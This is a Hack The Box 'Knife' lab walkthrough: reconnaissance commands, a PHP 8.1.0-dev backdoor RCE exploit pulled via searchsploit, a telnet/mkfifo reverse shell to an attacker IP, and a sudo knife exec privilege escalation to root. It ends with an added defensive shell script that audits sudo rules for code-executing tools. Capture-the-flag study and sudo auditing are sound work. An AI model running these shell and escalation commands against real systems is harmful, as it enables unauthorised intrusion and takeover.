Knife - Hack The Box
Reconnaissance
- Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.10.10.242
- Whatweb
whatweb http://10.10.10.242/
Exploitation
- PHP 8.1.0-dev User Agent RCE
searchsploit php 8.1.0-dev
searchsploit -m php/webapps/49933.py
python3 49933.py
- Send reverse shell
TF=$(mktemp -u);mkfifo $TF && telnet 10.10.16.7 9000 0<$TF | /bin/bash 1>$TF
nc -nlvp 9000
Post-exploitation
- Check sudoers
sudo -l
- Knife Sudoers
sudo knife exec -E 'exec "/bin/sh"'
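From the defender's side, the sudo rule abused in the last step can be caught by auditing sudo -l output for rules that grant a tool able to run arbitrary code (knife exec evaluates Ruby as the target user). The script below is an added example, not part of the original notes; the RISKY list, the function names and the sample sudo -l output are assumptions constructed for illustration.

```shell
#!/bin/sh
# Audit `sudo -l` output for rules that hand out a code-executing tool.
# RISKY is an illustrative, non-exhaustive list (assumption); extend it as needed.
RISKY="knife ruby python python3 perl sh bash vim find awk"

# Reads `sudo -l` text on stdin; prints "<severity> <runas> <command>" per risky rule.
audit_sudo_list() {
    awk -v risky="$RISKY" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    # Rule lines look like:  (root) NOPASSWD: /usr/bin/knife, /usr/bin/other
    /^[ \t]*\(/ {
        line = $0; sub(/^[ \t]*/, "", line)
        runas = line; sub(/\).*/, ")", runas)
        sub(/^\([^)]*\)[ \t]*/, "", line)
        nopass = 0
        # Leading tags such as NOPASSWD: or SETENV: are stripped; NOPASSWD is remembered
        while (match(line, /^[A-Z_]+:[ \t]*/)) {
            if (substr(line, 1, RLENGTH) ~ /^NOPASSWD:/) nopass = 1
            line = substr(line, RLENGTH + 1)
        }
        m = split(line, cmds, /,[ \t]*/)
        for (j = 1; j <= m; j++) {
            split(cmds[j], parts, " ")      # parts[1] is the binary path
            k = split(parts[1], seg, "/")   # seg[k] is its basename
            if (parts[1] == "ALL" || (seg[k] in bad))
                printf "%s %s %s\n", (nopass ? "HIGH" : "MEDIUM"), runas, cmds[j]
        }
    }'
}

# Constructed sample of `sudo -l` output (user and host names are made up).
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for appuser on host:
    env_reset, mail_badpass

User appuser may run the following commands on host:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/systemctl status nginx, /usr/bin/ruby
EOF
}

sample_sudo_l | audit_sudo_list
```

On a live host, pipe the real output instead: sudo -l | audit_sudo_list. Any HIGH line means the account can reach the run-as user without a password and should be replaced by a rule limited to a fixed, argument-pinned command or removed.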